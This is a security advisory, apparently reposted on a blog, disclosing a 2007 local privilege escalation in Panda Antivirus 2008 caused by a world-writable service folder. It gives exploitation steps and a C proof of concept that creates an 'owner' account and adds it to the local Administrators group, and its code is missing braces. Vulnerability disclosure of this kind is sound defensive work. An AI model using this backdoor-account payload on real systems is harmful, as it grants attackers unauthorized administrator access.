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Security Advisory

Severity: Medium
Title: Panda Antivirus 2008 Local Privileg Escalation
Date: 02.08.07
Author: tarkus (tarkus (at) tiifp (dot) org)
URL: https://tiifp.org/tarkus
Vendor: Panda (http://www.pandasoftware.com/)
Affected Products: Panda Antivirus 2008
Not Affected Products: - Panda Internetsecurity 2008
                        - Panda Antivirus + Firewall 2008

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1.  During  installation  of  Panda Antivirus 2008 the permissions for
installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008\
by  default  are  set  to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem  account. There is no protection of service files. It's
possible for unprivileged user to replace service executable with the
file of his choice to get full access with LocalSystem privileges. Or to
get privileges or any user (including system administrator) who logons
to vulnerable host. This can be exploited by:

   a. Rename  PAVSRV51.exe to PAVSRV51.old in Panda folder
   b. Copy any application to PAVSRV51.exe
   c. Reboot

Upon reboot trojaned application will be executed with LocalSystem

BTW: Check this from last year (http://www.securityfocus.com/bid/19891)


#include <windows.h>
#include <stdio.h>

INT main( VOID )
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;

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posted on 2007-08-07 21:31  %5C  阅读(350)  评论(0编辑  收藏  举报